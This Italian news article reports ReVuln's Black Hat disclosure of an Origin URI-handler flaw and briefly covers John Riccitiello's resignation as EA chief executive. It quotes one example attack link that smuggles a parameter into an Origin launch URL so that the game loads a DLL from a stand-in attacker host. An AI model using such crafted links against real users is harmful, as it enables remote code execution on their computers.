I ricercatori di ReVuln, un'azienda specializzata in sicurezza informatica, hanno trovato una falla di Origin che permette di prendere il controllo dei PC degli utenti. Il problema sembra che risieda nel protocollo usato dalla piattaforma di Electronic Arts per avviare i giochi attraverso il browser.
Origin vulnerabile agli attacchi di malintenzionati
Secondo lo staff di ReVuln basterebbe poco per avviare un malware in grado d'infettare un computer, camuffando un collegamento di Origin e rendendolo simile ai link che servono per far partire i giochi.
Normalmente un titolo di Origin richiede la stringa di comandi "origin://LaunchGame/[GameID]" per avviare un gioco attraverso il browser. ReVuln sostiene che i malintenzionati potrebbero modificare questo percorso in qualcosa simile a "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" per alterare il comando e causare l'apertura di un DLL esterno.
Il bug è stato dimostrato settimana scorsa, durante la conferenza Black Hat tenutasi ad Amsterdam. I ricercatori di ReVuln hanno presentato il risultato della loro scoperta in un documento e hanno persino registrato un breve video in cui si può notare il bug in azione.
"Il nostro team investiga costantemente su congetture come queste durante i continui miglioramenti alla sicurezza della nostra infrastruttura", ha dichiarato un portavoce di EA. Il bug di Origin sembra simile a quello riscontrato a ottobre su Steam dallo stesso gruppo di ricercatori. Il problema appartiene alla stessa famiglia di attacchi provenienti da link e collegamenti corrotti, o da trojan scaricati o ricevuti in allegato alle proprie email.
Ovviamente il consiglio è di non cliccare mai su link non verificati e ricchi di parametri strani, o quantomeno sospetti, a prescindere dal fatto che servano per far partire giochi di Origin o qualsiasi altra cosa.
John Riccitiello, ex amministratore delgato di EA
Una brutta tegola che si aggiunge alle recenti dimissioni di John Riccitiello come amministratore delegato di EA, dopo un ciclo durato sei anni. Il dirigente lascerà l'incarico a partire dal 30 marzo, ma a quanto pare il mercato ha reagito in modo positivo alla notizia, facendo segnare un rialzo delle azioni di Electronic Arts pari al 2,6 percento. Un segnale della buona accoglienza riservata a questa ventata di cambiamento o soltanto l'ennesimo "mistero" dei mercati azionari? Ai posteri l'ardua sentenza.